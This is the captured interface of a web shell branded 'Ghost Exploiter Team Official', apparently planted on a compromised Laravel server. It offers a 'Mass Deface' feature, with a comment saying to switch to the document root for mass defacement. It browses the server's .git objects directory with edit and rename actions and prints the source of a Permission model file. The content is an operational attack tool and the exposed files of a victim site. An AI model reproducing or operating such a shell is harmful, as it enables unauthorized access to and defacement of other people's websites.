Ghost Exploiter Team Official
Mass Deface
Directory >>
/
var
/
www
/
html
/
back
/
.git
/
objects
/
db
/
Mass Deface Auto Detect Domain
/*Ubah Ke document_root untuk mass deface*/
File / Folder
Size
Action
.
-
type
file
dir
+File/Dir
.gitignore
0.01KB
edt
ren
Payment.php
7.176KB
edt
ren
Permission.php
0.239KB
edt
ren
api.php
1.377KB
edt
ren
stash
0.04KB
edt
ren
<?php declare(strict_types=1); namespace App\Models; use Illuminate\Database\Eloquent\Factories\HasFactory; use Spatie\Permission\Models\Permission as SpatiePermission; final class Permission extends SpatiePermission { use HasFactory; }